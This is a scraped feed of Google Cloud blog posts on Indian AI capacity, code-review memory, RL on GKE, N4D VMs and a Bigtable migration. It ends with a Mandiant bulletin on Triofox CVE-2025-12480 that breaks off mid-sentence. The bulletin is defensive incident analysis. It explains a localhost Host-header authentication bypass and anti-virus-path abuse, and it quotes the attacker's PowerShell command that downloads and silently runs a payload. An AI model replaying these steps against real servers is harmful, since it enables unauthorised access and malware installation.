gcp

2025 11 11

GCP – Supporting Viksit Bharat: Announcing our newest AI investments in India

India’s developer community, vibrant startup ecosystem, and leading enterprises are embracing AI with incredible speed. To meet this moment for India, we are investing in powerful, locally-available tools in India that can help foster a diverse ecosystem, and ensure our platform delivers the controls you need for compliance and AI sovereignty.

Today, we’re announcing a significant expansion of our local AI hardware capacity for customers in India. This increase in local compute, powered by Google’s AI Hypercomputer architecture with the latest Trillium TPUs, will help more businesses and public sector organizations train and serve their most advanced Gemini models in India.

By unblocking new opportunities for high-performance, low-latency AI applications we can help customers meet India’s data residency and sovereignty requirements.

Enabling models and control: AI tools built for India’s context

While infrastructure is the foundation for digital sovereignty, it also requires control over the data and the models built on it. We’re committed to bringing our latest AI advancements to India faster than ever, with the controls you need.

Our new services would enable you to build, tune, and deploy models that understand India’s unique business logic and rich cultural context.

Next-generation models, here in India: Earlier this year, Google Cloud made Gemini available to regulated Indian customers by deploying Gemini 2.5 Flash with local machine-learning processing support. Now, we’re opening early testing for our latest and most advanced Gemini models to Indian customers. We’re also committing to launching the most powerful Gemini models in India with full data residency support. This is a first for Google Cloud, and a direct response to help meet the needs of our Indian customers.
More AI capabilities, available locally: We’re providing additional consumption models and pre-built AI-powered applications tailored for local context by launching a suite of new capabilities with data residency support in India:

Batch support for Gemini 2.5 Flash: Now generally available, this allows organizations to run high-volume, non-real-time AI tasks at a lower cost, all in India.
Document AI: Now in preview, we’re providing local support to help Indian businesses automate document processing.

More local context in your AI: Grounding on Google Maps is a new capability to ground model responses in real time from Google Maps, ensuring AI applications can provide accurate, location-aware answers.

A sovereign AI ecosystem: Building for India, with India

The most durable and decisive factor for long-term digital sovereignty lies in cultivating the “human element” — the skilled talent and innovation ecosystem. A sovereign AI future depends on building a strong local ecosystem.

Our strategy is to support India’s ecosystem-led approach by investing in the researchers, developers, and startups who are building for India’s specific needs.

Collaboration with IIT Madras: Google Cloud and Google DeepMind are thrilled to collaborate with IIT Madras to support the launch of Indic Arena. Run independently by the renowned AI4Bharat center at IIT Madras, this platform will allow users from all over India to anonymously evaluate and rank AI models on tasks unique to India’s rich multilingual landscape. To support this initiative, we are providing cloud credits to power this critical, community-driven resource.

“At AI4Bharat, our mission is to build AI for India’s specific needs. A critical part of this is having a neutral, standardized benchmark to understand how models are performing across our many languages,” said Mitesh Khapra, associate professor, IIT Madras. “Indic Arena will be that platform. We are delighted to have Google Cloud’s support to provide the initial compute power to bring this independent, public-facing project to life for the entire Indian AI community.”

We encourage all developers, researchers, and organizations in India to explore the Indic Arena platform and contribute to building a more inclusive AI future.

We invite the entire Indian ecosystem, from startups and universities to government bodies and enterprises, to take advantage of this new, dedicated capacity for Gemini in Vertex AI and our sovereign-ready infrastructure to build the next generation of AI that is built by Indians, for Indians.

Read More for the details.

2025 11 10

GCP – Achieve better AI-powered code reviews using new memory capabilities on Gemini Code Assist

Tibor Kiss Cloud, Google Cloud gcp

The best feedback during a code review is specific, consistent, and understands the history of a project.

However, AI code review agents today are often stateless; they have no memory of past interactions. This means you might find the same feedback on new pull requests that you’ve rejected before, because the agent can’t learn from your team’s guidance, leading to frustration and repeated work.

Today, we’re releasing a new memory capability for Gemini Code Assist on GitHub for both enterprises and individual developers. Now, you can create a dynamic, evolving memory of your team’s coding standards, style, and best practices, all derived from your direct interactions and feedback within pull requests. The memory is stored securely in a Google-managed project specific to your installation, isolating it from other users.

Here’s how memory works

Memory transforms the code review agent from a stateless tool into a long-term project contributor that learns and adapts to your team.

Automated vs. manual memory

Gemini Code Assist on GitHub already supports memory in the form of styleguide.md files. These rules are always added to the agent’s prompt, which makes it suitable for static, universal guidelines.

In contrast, persistent memory introduces a more dynamic and automated approach. It automatically extracts rules from pull request interactions, requiring no manual effort. These learned rules are stored efficiently and are only retrieved and applied when they are relevant to the specific code being reviewed. This creates a smarter, more scalable memory that adapts to your team

The process is built on three key pillars:

1. It learns from your interactions

The process begins when you and your team do what you already do today – conducting code reviews: When a pull request is merged, Gemini Code Assist on GitHub will analyze the comment threads for feedback. For instance, if Gemini Code Assist on GitHub points out that “do not line-wrap import statements” in a .java file, and the author disagrees in their comment, the agent sees this interaction as a valuable piece of feedback and will store it. By waiting until a PR is merged, we ensure the conversation is complete and the code is a valuable source of truth.

2. It intelligently creates, updates and stores rules

From that simple interaction, persistent memory uses the powerful Gemini model to infer a generalized, reusable rule. In the example above, it would generate a natural language rule like: “In Java, import statements could be line-wrapped”.

3. It applies rules to future reviews

Once rules are stored in memory, the agent uses them in two critical ways:

To guide the initial review: Before it even begins analyzing a new pull request, the agent will query the persistent memory for a broad set of relevant rules for the repository. This helps shape its initial analysis to be more in line with your team’s established patterns.
To filter its own suggestions: After generating a set of draft review comments, the agent performs a second check. It retrieves highly specific rules related to its own comments and evaluates them. This acts as a filter to ensure its suggestions don’t violate a previously learned best practice, allowing it to drop or modify comments before you ever see them.

As more rules are accrued, the team’s tribal knowledge is shared across the codebase through code reviews.

Getting started

New to the app?

If you are an individual developer or OSS maintainer, install Gemini Code Assist on GitHub from the GitHub Marketplace.
If you are an enterprise customer, onboard through the Google Cloud Console. Review our documentation to learn more about the setup and using the Code Review capability. See this video for a walkthrough of the process.

Already have the app installed?

If you are an individual developer or OSS maintainer, enable this feature in the Gemini Code Assist on the Github admin panel.
If you are an enterprise customer, enable this feature in the Google Cloud Console

Read More for the details.

2025 11 10

GCP – Running high-scale reinforcement learning (RL) for LLMs on GKE

Tibor Kiss Cloud, Google Cloud gcp

As Large Language Models (LLMs) evolve, Reinforcement Learning (RL) is becoming the crucial technique for aligning powerful models with human preferences and complex task objectives.

However, enterprises that need to implement and scale RL for LLMs are facing infrastructure challenges. The primary hurdles include the memory contention from concurrently hosting multiple large models (such as the actor, critic, reward, and reference models), iterative switching between high latency inference generation, and high throughput training phases.

This blog details Google Cloud’s full-stack, integrated approach, from custom TPU hardware to the GKE orchestration layer — and shares how you can solve the hybrid, high-stakes demands of RL at scale.

A quick primer: Reinforcement Learning (RL) for LLMs

RL is a continuous feedback loop that combines elements of both training and inference. At a high level, the RL loop for LLMs functions as follows:

The LLM generates a response to a given prompt.
A “reward model” (often trained on human preferences) assigns a quantitative score, or reward, to the output.
An RL algorithm (e.g., DPO, GRPO) uses this reward signal to update the LLM’s parameters, adjusting its policy to generate higher-rewarding outputs in subsequent interactions.

This generation, evaluation, and optimization continually improves the LLM’s performance based on predefined objectives.

RL workloads are hybrid and cyclical. The main goal of RL is not to minimize error (training) or fast prediction (inference), but to maximize reward through iterative interaction. The primary constraint for the RL workload is not just the computational power, but also system-wide efficiency, specifically minimizing aggregate sampler latency and maximizing the speed of weight copying for efficient end-to-end step time.

Google Cloud’s full-stack approach to RL

Solving these system-wide challenges requires an integrated approach. You can’t just have fast hardware or a good orchestrator; you need every layer of the stack to work together. Here is how our full-stack approach is built to solve the specific demands of RL:

1. Flexible, high-performance compute (TPUs and GPUs): Instead of locking customers into one path, we provide two high-performance options. Our TPU stack is a vertically integrated, JAX-native solution where our custom hardware (excelling at matrix operations) is co-designed with our post-training libraries (MaxText and Tunix). In parallel, we fully support the NVIDIA GPU ecosystem, partnering with NVIDIA on optimized NeMo RL recipes so customers can leverage their existing expertise directly on GKE.

2. Holistic, full-stack optimization: We integrate optimization from the bare metal up. This includes our custom TPU accelerators, high-throughput storage (Managed Lustre, Google Cloud Storage), and — critically — the orchestration and scheduling that GKE provides. By optimizing the entire stack, we can attack the system-wide latencies that bottleneck hybrid RL workloads.

3. Leadership in open-source: RL infrastructure is complex and built on a wide range of tools. Our leadership starts with open-sourcing Kubernetes and extends to active partnerships with orchestrators like Ray. We contribute to key projects like vLLM, develop open-source solutions like llm-d for cost-effective serving, and open-source our own high-performance MaxText and Tunix libraries. This helps ensure you can integrate the best tools for the job, not just the ones from a single vendor.

4. Proven, mega-scale orchestration: Post-training RL can require compute resources that rival pre-training. This requires an orchestration layer that can manage massive, distributed jobs as a single unit. GKE AI mega-clusters support up to 65,000 nodes today, and we are heavily investing in multi-cluster solutions like MultiKueue to scale RL workloads beyond the limits of a single cluster.

Running RL workloads on GKE

Existing GKE infrastructure is well-suited for demanding RL workloads and provides several infrastructure-level efficiencies.

The image below outlines the architecture and key recommendations for implementing RL at scale.

Figure : GKE infrastructure for running RL

At the base, the infrastructure layer provides the foundational hardware, including supported compute types (CPUs, GPUs, and TPUs). You can use the Run:ai model streamer to accelerate the model streaming for all three compute types. High performance storage (Managed Lustre, Cloud Storage) can be used for storage needs for RL.

The middle layer is the managed K8s layer powered by GKE, which handles the resource orchestration, resource obtainability using Spot or Dynamic Workload Scheduler, autoscaling, placement, job queuing and job scheduling and more at mega scale.

Finally, the open frameworks layer runs on top of GKE, providing the application and execution environment. This includes the managed support for open-source tools such as KubeRay, Slurm and gVisor sandbox for secure isolated task execution.

Building RL workflow

Before creating an RL workload, you must first identify a clear use case. With that objective defined, you then architect the core components: selecting the algorithm (e.g, DPO, GRPO), the model server (like vLLM or SGLang), the target GPU/TPU hardware, and other critical configurations.

Next, you can provision a GKE cluster configured with Workload Identity, GCS Fuse, and DGCM metrics. For robust batch processing, install the Kueue and JobSet APIs. We recommend deploying Ray as the orchestrator on top of this GKE stack. From there, you can launch the Nemo RL container, configure it for your GRPO job, and begin monitoring its execution. For the detailed implementation steps and source code, please refer to this repository.

Getting started with RL

Run RL on GPUs: Try the RL recipe on TPUs using MaxText and Pathways for GRPO algorithm, or if you use GPUs, try the NemoRL recipes.
Partner with the open-source ecosystem: Our leadership in AI is built on open standards like Kubernetes, llm-d, Ray, MaxText or Tunix. We invite you to partner with us to build the future of AI together. Come contribute to llm-d! Join the llm-d community, check out the repository on GitHub, and help us define the future of open-source LLM serving.

Read More for the details.

2025 11 10

GCP – N4D now GA: Gain up to 3.5x price-performance for scale-out workloads

Tibor Kiss Cloud, Google Cloud gcp

In today’s competitive environment, IT leaders are faced with supporting application scale, rolling out more features, and enabling high-bar customer experiences. This creates a direct and complex challenge: finding the right balance between performance and total cost of ownership (TCO) for the general-purpose workloads that power everyday business operations.

Today, we are announcing the general availability of the N4D machine series, the latest addition to Google Compute Engine’s cost-optimized, general-purpose portfolio. Addressing a wide range of workloads, such as web and application servers, data analytics platforms, and containerized microservices, N4D provides a flexible and price-performant solution.

The N4D machine series combines Google’s Titanium infrastructure with 5th Gen AMD EPYC™ “Turin” processors, delivering up to 3.5x the throughput for web-serving workloads vs. the previous-generation N2D. N4D offers predefined shapes of up to 96 vCPUs and 768 GB of DDR5 memory, up to 50 Gbps of networking bandwidth, and Hyperdisk Balanced and Throughput storage. To deliver a blended cost savings, N4D allows you to move beyond rigid instance sizing for both compute and storage, with Custom Machine Types to independently configure the exact number of vCPUs and amount of memory, complemented with Hyperdisk, for tuning disk storage performance and capacity. For the most demanding general purpose workloads, pair N4D together with consistently high performance of C4D.

Google Cloud provides workload-optimized infrastructure to ensure the right resources are available for every task. Titanium in particular, with its multi-tier offloads and security capabilities, is foundational to that infrastructure. Titanium offloads networking and storage processing to free up the CPU, and its dedicated SmartNIC manages all I/O, ensuring the AMD EPYC cores are reserved exclusively for your application. Titanium is part of Google Cloud’s vertically integrated stack — from the custom silicon in our servers to our planet-scale network traversing 7.75 million kilometers of terrestrial and subsea fiber across 42 regions — that is engineered to maximize efficiency and provide the ultra-low latency and high bandwidth to customers at global scale.

A new standard for price-performance

N4D machine series doesn’t just inch past the previous N2D generation; it sprints, delivering up to 50% higher price-performance for general computing workloads and up to 70% better price-performance for Java workloads. For web-serving workloads, N4D leverages Titanium and AMD’s Turin processors to drive incredible throughput. This results in up to 3.5x the price-performance vs N2D, driving faster response times and a better overall experience for your end-users.

As of October 2025. Performance based on the estimated SPECrate®2017_int_base, estimated SPECjbb2015, and Google internal Nginx Reverse Proxy benchmark scores run in production. Price-performance claims based on published and estimated list prices for Google Cloud.

“Our edge proxy fleet and internal data pipelines observed a 3-4x performance improvement on Google Cloud’s N4D instances compared to N2D. Our benchmarks also show N4D processes the same workload with significantly greater consistency while using just a fraction of the CPU. This leap in price-performance allows us to efficiently scale our general-purpose workloads, and fits neatly in our fleet alongside more specific Google compute products we leverage.” – Matt Schallert, Member of Technical Staff, Chronosphere

“A 10% increase in throughput while cutting costs by up to 50% is a massive win for TCO optimization. That’s what we achieved on Google Cloud’s N4D machine series. For MediaGo, this efficiency is critical. It allows our AI-driven advertising platform to scale more cost-effectively, directly supporting our mission to maximize ROI for our global partners.” – MediaGo

“The move from N2D to N4D is a significant generational leap. This 144.14% performance uplift over 152 tests is a testament to Google’s Titanium, unlocking the full potential of the new AMD EPYC ‘Turin’ processors. For those looking for the best possible price-performance in Google Cloud, the N4D instances are a clear winner.” – Michael Larabel, Founder and Principal Author, Phoronix (Read the full study here.)

“With the launch of the new N4D instances, Google Cloud now offers the most comprehensive portfolio based on our 5th Gen AMD EPYC processors, marking a significant milestone in our strategic partnership. N4D machine series combines the leading performance of AMD CPUs with the uniqueness of Google’s Custom Machine Types to deliver a remarkable uplift in price-performance, flexibility, and cost-optimization for everyday workloads. Our benchmark tests confirm this, showing measured performance gains of up to 75% over the previous generation N2D machine series for media encode and transcode workloads.” – Ryan Rodman, Sr Director, Cloud Business Group, AMD

Complementing C4D machine series

Earlier this year, we introduced our general-purpose C4D machine series built on the same underlying processor as N4D. Its consistently high performance and enterprise features like advanced maintenance support, larger shapes, and our next-gen Titanium Local SSDs, make C4D a great fit for critical workloads. In fact, customers such as Silk and Chess.com report greater than 40% improvement in performance with C4D over prior generations.

But critical applications are only part of the story. A modern cloud architecture must also run countless general-purpose workloads where flexibility and price-performance are key. That’s why we designed N4D — as a complement to C4D. By leveraging C4D and N4D in tandem, you unlock the full spectrum of enterprise features, performance, flexibility, and cost-optimization, choosing:

C4D for consistent performance: This is your solution for the most demanding, latency-sensitive applications. With up to 200 Gbps networking, Local SSD support along with larger shapes up to 384 vCPUs and bare metal options, C4D delivers predictable, high-end performance for large databases, high-traffic ad and game servers, and demanding AI/ML inference workloads.
N4D for flexible cost-optimization: This is the engine for the vast majority of your general-purpose workloads. N4D’s leading price-performance, low cost, and flexibility allow you to slash TCO for applications like web servers, microservices, and development environments.

This approach is already delivering real-world results, allowing customers like Verve to optimize their business from both ends.

“With Google’s Gen4 AMD portfolio, we can optimize for both revenue and cost simultaneously. C4D provides the consistent peak performance we need for our core ad servers — 81% faster than C3D — which directly translates to more revenue from higher fill-rates (successful bid/ask matching). Meanwhile, N4D delivers an incredible 2x performance and price-performance over N2D for everyday workloads, including scale-out microservices with GKE, enabling us to grow while slashing our overall TCO. This ‘Better Together’ strategy allows us to use the consistently peak performance of C4D for our mission-critical services and the flexible, cost-efficient N4D to aggressively reduce TCO everywhere else — a level of optimization that simply isn’t possible with a single VM type elsewhere.” – Pablo Loschi, Principal Systems Engineer at Verve

The Custom Machine Type and Hyperdisk advantage

Custom Machine Types are a key differentiator for Google Cloud, letting you go beyond predefined “T-shirt sizes”. Instead of forcing your workload into a box, you can tailor the infrastructure to fit your workload’s needs, saving on cost. For instance, a memory-intensive workload requiring 16 vCPUs and 70 GB of RAM might typically be placed on a predefined N4D-highmem-16 shape, forcing you to pay for unused resources. With CMTs, you provision the exact 16 vCPU and 70 GB configuration, eliminating that waste and achieving up to 17% cost savings.

With shapes of up to 96 vCPUs and 768 GB of DDR5 memory, the combination of Custom Machine Types and N4D lets you dial in the exact resources you need with flexible vCPU-to-memory ratios along with extended memory support.

“At Symbotic, our vision is to revolutionize the global supply chain with an AI-powered robotics platform built for scale and efficiency. This demands an infrastructure that is both powerful and scalable. Google Cloud’s N4D VMs, powered by AMD’s latest EPYC processors, delivered exactly that. We observed a significant 40% performance uplift compared to the previous N2D generation, allowing us to cut our CPU footprint in half with no change in simulation speed or fidelity. The ability to pair these gains with Custom Machine Types — a capability unique to Google Cloud — is a game-changer. It allows us to precisely sculpt our infrastructure to our workloads and gain a significant TCO advantage versus other cloud offerings.” – Dan Inbar, Chief Information Officer, Symbotic

This granular control and TCO advantage extends beyond compute to your storage. Just as Custom Machine Types let you break free from fixed vCPU-to-memory ratios, Hyperdisk unbundles storage performance from capacity, letting you independently tune capacity and performance to precisely match your workload’s block storage requirements.

This is further enhanced by Hyperdisk Storage Pools for Hyperdisk Balanced volumes, which let you provision performance and capacity in aggregate, rather than managing each volume individually. The result is simpler management, higher efficiency, an easier path for modernizing SAN workloads — all this while helping you lower your storage TCO by as much as 30-50%.

Get started with N4D today

Adopting the latest N4D VM series is easy, particularly if you use Google Kubernetes Engine (GKE), where our custom compute classes remove the operational hurdles of migrating workloads to new hardware. Just add N4D to your prioritized list of VM types to ensure your workloads have the performance and flexibility they need to scale.

N4D is now available in us-central1 (Iowa), us-east1 (South Carolina), us-west1 (Oregon), us-west4 (Las Vegas), europe-west1 (Belgium), and europe-west4 (Netherlands).

Check for the latest availability on our Regions and Zones page and deploy your first instance today in the Google Cloud console or with GKE. Learn more about N4D details here in documentation.

^{1. 9xx5C-044 – Testing by AMD Performance Labs as of 10/21/2025. N4D-standard-16 score comparison to N2D-standard-16 running FFmpeg v6.1.1 benchmark (average of 2x encode and 2x transcode) on Ubuntu24.04LTS OS with 6.8.0-1021-gcp kernel, SMT On.}

^{Performance uplift (normalized to N2D):}

^{Ffmpeg_raw_vp9 1.76}^{Ffmpeg_h264_vp9 1.76}^{Ffmpeg_raw_h264 1.71}^{Ffmpeg_vp9_h264 1.76}^{FFmpeg average 1.75}

^{Cloud performance results presented are based on the test date in the configuration. Results may vary due to changes to the underlying configuration, and other conditions such as the placement of the VM and its resources, optimizations by the cloud service provider, accessed cloud regions, co-tenants, and the types of other workloads exercised at the same time on the system}

Read More for the details.

2025 11 10

GCP – Zeotap’s big win: 46% TCO reduction and enhanced real-time performance with Bigtable

Tibor Kiss Cloud, Google Cloud gcp

In today’s fast-paced, data-driven landscape, the ability to process, analyze, and act on vast amounts of data in real time is paramount. For businesses aiming to deliver personalized customer experiences and optimize operations, the choice of database technology is a critical decision.

At Zeotap — a leading Customer Data Platform (CDP) — we empower enterprises to unify their data from disparate sources to build a comprehensive, unified view of their customers. This enables businesses to activate data across various channels for marketing, customer support, and analytics. Zeotap handles more than 10 billion new data points a day from more than 500 data sources across our clients, while orchestrating through more than 2000 workflows — one-third of those in real time with milliseconds latency. To meet stringent SLAs for data freshness and end-to-end latencies, performance is crucial.

However, as Zeotap grew, our ScyllaDB-based infrastructure faced scaling challenges, especially as the business needed to evolve towards real-time use cases and increasingly spiky workloads. We needed a more flexible, performant, cost-effective, and operationally efficient solution, which led us to Bigtable, a low-latency, NoSQL database service from Google Cloud for machine learning, operational analytics, and high-throughput applications. The migration resulted in significant benefits, including a 46% reduction in Total Cost of Ownership (TCO).

The challenge of scaling real-time analytics

Zeotap’s platform demands a database capable of handling a high write throughput of over 300,000 writes per second and nearly triple that in reads during peaks.

As our platform evolved, the initial architecture presented several hurdles:

Scalability limitations: We initially self-managed ScyllaDB, on-prem, and later on in the cloud. We use Spark and BigQuery for analytical batch processing, but managing these different tools and pipelines across our own environment and customer environments reached a peak where scaling became increasingly harder.
Operational overhead: Managing and scaling our previous database infrastructure required significant operational effort. We had to run scripts in the background to add nodes when resource alerts came up and had to map hardware to different kinds of workloads.
Deployment complexity: Embedding third-party technology in our stack complicated deployment. The commercial procurement process was also cumbersome.
Cost predictability: Ensuring predictable costs for us and our clients was a growing concern as our business grew.

These challenges drove us to re-evaluate our data infrastructure and seek a cloud-native solution that could meet our streaming first, “zero-touch” ops philosophy, while supporting our demanding OLAP and OLTP workloads.

Why Bigtable? Performance, scalability, and efficiency

Zeotap’s decision to migrate to Bigtable was driven by four key requirements:

Operational simplicity: Moving from ScyllaDB cluster to Bigtable meant eliminating a significant operational burden and achieving “zero-touch ops”. Bigtable abstracts away hardware mapping and node management. This eliminates the need for maintenance windows and helps ensure data rebalancing.
Performance: Zeotap needed predictable performance, even in the face of regularly unpredictable workloads to meet our stringent SLAs. Bigtable’s ability to deliver low latencies for both reads and writes at scale was crucial — especially with spiky traffic patterns.
Efficient scalability: Managing ScyllaDB cluster scaling, rebalancing, and hotspots was operationally intensive. Zeotap handles very spiky and bursty workloads at times exceeding 300,000 writes per second. Bigtable disaggregates compute and storage, allowing for rapid scaling (further enhanced by autoscaling), which automatically adjusts cluster size in response to demand. This lead to more cost efficiency and helped eliminate idle resources.
Total cost of ownership (TCO): A significant driver of this migration was the need for cost efficiency and predictability. By moving from ScyllaDB to Bigtable, we achieved a significant 46% reduction in our TCO. This stems from Bigtable’s efficient storage and the ability to combine use cases, such as using Bigtable as a hot store and BigQuery as a warm store.
Tight integration: Bigtable’s integration with other Google Cloud services, particularly BigQuery, was a major advantage in reducing operational overhead. Features like reverse ETL directly into Bigtable greatly simplifies data pipelines and reduces Zeotap’s operational footprint by 20%.

aside_block: <ListValue: [StructValue([(‘title’, ‘Build smarter with Google Cloud databases!’), (‘body’, <wagtail.rich_text.RichText object at 0x7f583d15dd00>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>

Zeotap’s architectural evolution to cloud-native

Zeotap’s transition to Bigtable wasn’t an overnight lift-and-shift, but part of a strategic plan to build a streaming real-time analytics platform that could meet the needs of an evermore demanding customer landscape:

2020: After running one of the largest graphs with JanusGraph-on-ScyllaDB and a heavy processing operation with Spark on AWS, we made the strategic move to migrate to Google Cloud.
2022: Adopted a Lambda architecture, heavily pivoting into BigQuery, and moving away from graph due to performance issues. ScyllaDB was acting now as a pure key-value store.
2023: Shifted to a Kappa architecture, prioritizing real-time ingestion and streaming. This was a major network redesign to meet the needs of clients for real-time use cases.
2024: Fully committed to a cloud-native model with Bigtable and BigQuery as its core, while eliminating Spark from our stack.

In our current architecture, Zeotap’s ingestion layer runs via Dataflow and a home-grown streaming engine with a combination of Memorystore and Bigtable powering inline enrichment, transformation, and ingestion. We used Memorystore as a lightning-fast cache layer to speed up read-heavy workloads, while helping to reduce strain on Bigtable. Bigtable serves as the hot store for real-time ingestion and data API for low-latency point lookups, while BigQuery acts as the warm and cold store for analytics, inferencing, and batch processing.

This architectural transformation, with Bigtable at its heart, enables us to:

Consolidate fragmented data: Bigtable handles the complex multi-read/write operations required to build single customer views. The data derives from hundreds of different channels, ERP, CRM, web apps, and data warehouses. The data have different types of ID that need to get stitched together as they get consolidated into Bigtable.
Deliver real-time customer 360: Serves comprehensive customer profiles, including identities, attributes, streaming events, calculated attributes, and consent data — all through our Bigtable-backed data API. This enables the same unified assets available across the entire customer lifecycle — empowering customer support, marketers, and data analysts alike.
Optimize AI pipelines: The synergy between Bigtable as a feature store, and BigQuery as our inferencing platform by leveraging BQML, has dramatically shrunk our time to market for AI model deployment for clients — down from multiple weeks to less than a week.

Results and looking forward

Migrating to Bigtable has delivered substantial, quantifiable benefits for Zeotap. Most notably, we achieved a 46% decrease in Total Cost of Ownership (TCO) compared to our previous infrastructure. This cost efficiency was paired with a 20% reduction in overall operational tasks and overhead — a direct result of the tight integration between Bigtable and BigQuery. Beyond resource savings, the platform now offers enhanced performance and reliability — with lower latencies — enabling us to confidently meet our stringent Service Level Agreement (SLA) commitments. Furthermore, Bigtable has improved our agility, allowing for faster deployment of AI/ML models across various environments with efficient resource utilization, such as reading batch workloads off our Disaster Recovery (DR) cluster.

Transform your data infrastructure with Bigtable

Zeotap’s migration is a compelling example of how choosing the right database can address the challenges of scale, performance, and operational complexity in the era of real-time data and AI. By leveraging Bigtable’s capabilities for high throughput, low-latency reads, and efficient handling of demanding workloads, coupled with its seamless integration with BigQuery, Zeotap built a more flexible, efficient, and cost-effective platform that empowers customers’ real-time data initiatives.

Learn more

Check out the power of Bigtable and begin planning your migration today.
Discover Bigtable’s Cassandra API and tools for no-downtime, no code-change migrations from ScyllaDB and Cassandra
Read more about new Bigtable features like SQL support, distributed counters, continuous materialized views, tiered storage and data boost.

Read More for the details.

2025 11 10

GCP – No Place Like Localhost: Unauthenticated Remote Access via Triofox Vulnerability CVE-2025-12480

Tibor Kiss Cloud, Google Cloud gcp

Written by: Stallone D’Souza, Praveeth DSouza, Bill Glynn, Kevin O’Flynn, Yash Gupta

Welcome to the Frontline Bulletin Series

Straight from Mandiant Threat Defense, the “Frontline Bulletin” series brings you the latest on the threats we are seeing in the wild right now, equipping our community to understand and respond.

Introduction

Mandiant Threat Defense has uncovered exploitation of an unauthenticated access vulnerability within Gladinet’s Triofox file-sharing and remote access platform. This now-patched n-day vulnerability, assigned CVE-2025-12480, allowed an attacker to bypass authentication and access the application configuration pages, enabling the upload and execution of arbitrary payloads.

As early as Aug. 24, 2025, a threat cluster tracked by Google Threat Intelligence Group (GTIG) as UNC6485 exploited the unauthenticated access vulnerability and chained it with the abuse of the built-in anti-virus feature to achieve code execution.

The activity discussed in this blog post leveraged a vulnerability in Triofox version 16.4.10317.56372, which was mitigated in release 16.7.10368.56560.

Gladinet engaged with Mandiant on our findings, and Mandiant has validated that this vulnerability is resolved in new versions of Triofox.

Initial Detection

Mandiant leverages Google Security Operations (SecOps) for detecting, investigating, and responding to security incidents across our customer base. As part of Google Cloud Security’s Shared Fate model, SecOps provides out-of-the-box detection content designed to help customers identify threats to their enterprise. Mandiant uses SecOps’ composite detection functionality to enhance our detection posture by correlating the outputs from multiple rules.

For this investigation, Mandiant received a composite detection alert identifying potential threat actor activity on a customer’s Triofox server. The alert identified the deployment and use of remote access utilities (using PLINK to tunnel RDP externally) and file activity in potential staging directories (file downloads to C:WINDOWSTemp).

Within 16 minutes of beginning the investigation, Mandiant confirmed the threat and initiated containment of the host. The investigation revealed an unauthenticated access vulnerability that allowed access to configuration pages. UNC6485 used these pages to run the initial Triofox setup process to create a new native admin account, Cluster Admin, and used this account to conduct subsequent activities.

Triofox Unauthenticated Access Control Vulnerability

Figure 1: CVE-2025-12480 exploitation chain

During the Mandiant investigation, we identified an anomalous entry in the HTTP log file – a suspicious HTTP GET request with an HTTP Referer URL containing localhost. The presence of the localhost host header in a request originating from an external source is highly irregular and typically not expected in legitimate traffic.

GET /management/CommitPage.aspx - 443 - 85.239.63[.]37 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/101.0.4951.41+Safari/537.36 http://localhost/management/AdminAccount.aspx 302 0 0 56041

Figure 2: HTTP log entry

Within a test environment, Mandiant noted that standard HTTP requests issued to AdminAccount.aspx result in a redirect to the Access Denied page, indicative of access controls being in place on the page.

Figure 3: Redirection to AccessDenied.aspx when attempting to browse AdminAccount.aspx

Access to the AdminAccount.aspx page is granted as part of setup from the initial configuration page at AdminDatabase.aspx. The AdminDatabase.aspx page is automatically launched after first installing the Triofox software. This page allows the user to set up the Triofox instance, with options such as database selection (Postgres or MySQL), connecting LDAP accounts, or creating a new native cluster admin account, in addition to other details.

Attempts to browse to the AdminDatabase.aspx page resulted in a similar redirect to the Access Denied page.

Figure 4: Redirection to AccessDenied.aspx when attempting to browse AdminDatabase.aspx

Mandiant validated the vulnerability by testing the workflow of the setup process. The Host header field is provided by the web client and can be easily modified by an attacker. This technique is referred to as an HTTP host header attack. Changing the Host value to localhost grants access to the AdminDatabase.aspx page.

Figure 5: Access granted to AdminDatabase.aspx by changing Host header to localhost

By following the setup process and creating a new database via the AdminDatabase.aspx page, access is granted to the admin initialization page, AdminAccount.aspx, which then redirects to the InitAccount.aspx page to create a new admin account.

Figure 6: Successful access to the AdminCreation page InitAccount.aspx

Analysis of the code base revealed that the main access control check to the AdminDatabase.aspx page is controlled by the function CanRunCrticalPage(), located within the GladPageUILib.GladBasePage class found in C:Program Files (x86)TriofoxportalbinGladPageUILib.dll.

public bool CanRunCriticalPage()
{
    Uri url = base.Request.Url;
    string host = url.Host;
    bool flag = string.Compare(host, "localhost", true) == 0; //Access to the page is granted if Request.Url.Host equals 'localhost', immediately skipping all other checks if true

    bool result;
    if (flag)
    {
        result = true;
    }
    else
    {
       //Check for a pre-configured trusted IP in the web.config file. If configured, compare the client IP with the trusted IP to grant access
 
string text = ConfigurationManager.AppSettings["TrustedHostIp"];
        bool flag2 = string.IsNullOrEmpty(text);
        if (flag2)
        {
            result = false;
        }
        else
        {
            string ipaddress = this.GetIPAddress();
            bool flag3 = string.IsNullOrEmpty(ipaddress);
            if (flag3)
            {
                result = false;
            }
            else
            ...

Figure 8: Vulnerable code in the function CanRunCrticalPage()

As noted in the code snippet, the code presents several vulnerabilities:

Host Header attack – ASP.NET builds Request.Url from the HTTP Host header, which can be modified by an attacker.
No Origin Validation – No check for whether the request came from an actual localhost connection versus a spoofed header.
Configuration Dependence – If TrustedHostIP isn’t configured, the only protection is the Host header check.

Triofox Anti-Virus Feature Abuse

To achieve code execution, the attacker logged in using the newly created Admin account. The attacker uploaded malicious files to execute them using the built-in anti-virus feature. To set up the anti-virus feature, the user is allowed to provide an arbitrary path for the selected anti-virus. The file configured as the anti-virus scanner location inherits the Triofox parent process account privileges, running under the context of the SYSTEM account.

The attacker was able to run their malicious batch script by configuring the path of the anti-virus engine to point to their script. The folder path on disk of any shared folder is displayed when publishing a new share within the Triofox application. Then, by uploading an arbitrary file to any published share within the Triofox instance, the configured script will be executed.

Figure 9: Anti-virus engine path set to a malicious batch script

SecOps telemetry recorded the following command-line execution of the attacker script:

C:Windowssystem32cmd.exe /c ""c:triofoxcentre_report.bat" C:WindowsTEMPeset_tempESET638946159761752413.av"

Post-Exploitation Activity

Support Tools Deployment

The attacker script centre_report.bat executed the following PowerShell command to download and execute a second-stage payload:

powershell -NoProfile -ExecutionPolicy Bypass -Command "$url = 'http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip'; $out = 'C:\WindowsappcompatSAgentInstaller_16.7.10368.56560.exe'; Invoke-WebRequest -Uri $url -OutFile $out; Start-Process $out -ArgumentList '/silent' -Wait"

The PowerShell downloader was designed to:

